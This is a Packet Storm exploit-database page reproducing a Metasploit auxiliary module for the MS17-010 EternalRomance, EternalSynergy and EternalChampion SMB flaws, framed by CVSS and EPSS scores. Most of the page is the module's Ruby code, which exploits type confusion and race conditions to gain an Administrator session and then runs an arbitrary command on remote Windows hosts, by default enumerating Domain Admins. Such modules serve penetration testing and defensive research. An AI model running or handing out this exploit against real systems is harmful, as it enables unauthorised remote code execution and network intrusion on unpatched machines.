Lucene search

K
packetstormShadow Brokers, Equation Group, sleepya, zerosum0x0, metasploit.comPACKETSTORM:180808
HistoryAug 31, 2024 - 12:00 a.m.

MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution

2024-08-3100:00:00
Shadow Brokers, Equation Group, sleepya, zerosum0x0, metasploit.com
packetstormsecurity.com
25
ms17-010
eternalromance
eternalsynergy
eternalchampion
smb
remote
windows
command execution
vulnerabilities
type confusion
race condition
named pipe

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

7.4

Confidence

Low

EPSS

0.963

Percentile

99.6%

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010  
include Msf::Exploit::Remote::SMB::Client::Psexec  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution',  
'Description' => %q{  
This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where  
primitive. This will then be used to overwrite the connection session information with as an  
Administrator session. From there, the normal psexec command execution is done.  
  
Exploits a type confusion between Transaction and WriteAndX requests and a race condition in  
Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy  
exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a  
named pipe.  
},  
  
'Author' => [  
'sleepya', # zzz_exploit idea and offsets  
'zerosum0x0',  
'Shadow Brokers',  
'Equation Group'  
],  
  
'License' => MSF_LICENSE,  
'References' => [  
[ 'MSB', 'MS17-010' ],  
[ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests  
[ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests  
[ 'CVE', '2017-0147'], # for EternalRomance reference  
[ 'URL', 'https://github.com/worawit/MS17-010' ],  
[ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],  
[ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],  
],  
'DisclosureDate' => '2017-03-14',  
'Notes' =>  
{  
'AKA' => [  
'ETERNALSYNERGY',  
'ETERNALROMANCE',  
'ETERNALCHAMPION',  
'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred  
]  
}  
))  
  
register_options([  
OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),  
OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group "Domain Admins" /domain']),  
OptPort.new('RPORT', [true, 'The Target port', 445]),  
OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS']),  
])  
  
register_advanced_options([  
OptString.new('FILEPREFIX', [false, 'Add a custom prefix to the temporary files','']),  
OptInt.new('DELAY', [true, 'Wait this many seconds before reading output and cleaning up', 0]),  
OptInt.new('RETRY', [true, 'Retry this many times to check if the process is complete', 0]),  
])  
  
deregister_options('SMB::ProtocolVersion')  
end  
  
def run_host(ip)  
begin  
if datastore['SMBUser'].present?  
print_status("Authenticating to #{ip} as user '#{splitname(datastore['SMBUser'])}'...")  
end  
eternal_pwn(ip) # exploit Admin session  
smb_pwn(ip) # psexec  
  
rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e  
print_error("#{e.message}")  
rescue ::Errno::ECONNRESET,  
::Rex::HostUnreachable,  
::Rex::Proto::SMB::Exceptions::LoginError,  
::Rex::ConnectionTimeout,  
::Rex::ConnectionRefused => e  
print_error("#{e.class}: #{e.message}")  
rescue => error  
print_error(error.class.to_s)  
print_error(error.message)  
print_error(error.backtrace.join("\n"))  
ensure  
eternal_cleanup() # restore session  
end  
end  
  
def smb_pwn(ip)  
text = "\\#{datastore['WINPATH']}\\Temp\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.txt"  
bat = "\\#{datastore['WINPATH']}\\Temp\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.bat"  
@smbshare = datastore['SMBSHARE']  
@ip = ip  
  
# Try and authenticate with given credentials  
output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, delay: datastore['DELAY'], retries: datastore['RETRY'])  
  
# Report output  
print_good("Command completed successfully!")  
print_status("Output for \"#{datastore['COMMAND']}\":\n")  
print_line("#{output}\n")  
report_note(  
:rhost => datastore['RHOSTS'],  
:rport => datastore['RPORT'],  
:type => "psexec_command",  
:name => datastore['COMMAND'],  
:data => output  
)  
end  
end  
`

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

AI Score

7.4

Confidence

Low

EPSS

0.963

Percentile

99.6%